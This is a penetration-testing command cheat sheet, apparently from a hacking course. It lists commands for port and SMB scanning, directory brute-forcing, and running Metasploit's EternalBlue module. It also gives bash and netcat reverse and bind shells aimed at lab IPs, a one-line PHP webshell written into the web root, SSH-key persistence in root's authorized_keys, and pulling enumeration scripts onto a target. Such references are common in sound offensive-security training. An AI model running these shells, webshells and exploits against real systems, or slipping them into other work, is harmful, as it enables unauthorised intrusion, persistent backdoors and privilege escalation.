| Service Scanning |
|
nmap 10.129.42.253 |
Run nmap on an IP |
nmap -sV -sC -p- 10.129.42.253 |
Run an nmap script scan on an IP |
locate scripts/citrix |
List various available nmap scripts |
nmap --script smb-os-discovery.nse -p445 10.10.10.40 |
Run an nmap script on an IP |
netcat 10.10.10.10 22 |
Grab banner of an open port |
smbclient -N -L \\\\10.129.42.253 |
List SMB Shares |
smbclient \\\\10.129.42.253\\users |
Connect to an SMB share |
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 |
Scan SNMP on an IP |
onesixtyone -c dict.txt 10.129.42.254 |
Brute force SNMP secret string |
| Web Enumeration |
|
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt |
Run a directory scan on a website |
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt |
Run a sub-domain scan on a website |
curl -IL https://www.inlanefreight.com |
Grab website banner |
whatweb 10.10.10.121 |
List details about the webserver/certificates |
curl 10.10.10.121/robots.txt |
List potential directories in robots.txt |
ctrl+U |
View page source (in Firefox) |
| Public Exploits |
|
searchsploit openssh 7.2 |
Search for public exploits for a web application |
msfconsole |
MSF: Start the Metasploit Framework |
search exploit eternalblue |
MSF: Search for public exploits in MSF |
use exploit/windows/smb/ms17_010_psexec |
MSF: Start using an MSF module |
show options |
MSF: Show required options for an MSF module |
set RHOSTS 10.10.10.40 |
MSF: Set a value for an MSF module option |
check |
MSF: Test if the target server is vulnerable |
exploit |
MSF: Run the exploit on the target server is vulnerable |
| Using Shells |
|
nc -lvnp 1234 |
Start a nc listener on a local port |
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' |
Send a reverse shell from the remote server |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f |
Another command to send a reverse shell from the remote server |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f |
Start a bind shell on the remote server |
nc 10.10.10.1 1234 |
Connect to a bind shell started on the remote server |
python -c 'import pty; pty.spawn("/bin/bash")' |
Upgrade shell TTY (1) |
ctrl+z then stty raw -echo then fg then enter twice |
Upgrade shell TTY (2) |
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php |
Create a webshell php file |
curl http://SERVER_IP:PORT/shell.php?cmd=id |
Execute a command on an uploaded webshell |
| Privilege Escalation |
|
./linpeas.sh |
Run linpeas script to enumerate remote server |
sudo -l |
List available sudo privileges |
sudo -u user /bin/echo Hello World! |
Run a command with sudo |
sudo su - |
Switch to root user (if we have access to sudo su) |
sudo su user - |
Switch to a user (if we have access to sudo su) |
ssh-keygen -f key |
Create a new SSH key |
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys |
Add the generated public key to the user |
ssh [email protected] -i key |
SSH to the server with the generated private key |
| Transferring Files |
|
python3 -m http.server 8000 |
Start a local webserver |
wget http://10.10.14.1:8000/linpeas.sh |
Download a file on the remote server from our local machine |
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh |
Download a file on the remote server from our local machine |
scp linenum.sh user@remotehost:/tmp/linenum.sh |
Transfer a file to the remote server with scp (requires SSH access) |
base64 shell -w 0 |
Convert a file to base64 |
echo f0VMR...SNIO...InmDwU | base64 -d > shell |
Convert a file from base64 back to its orig |
md5sum shell |
Check the file's md5sum to ensure it converted correctly |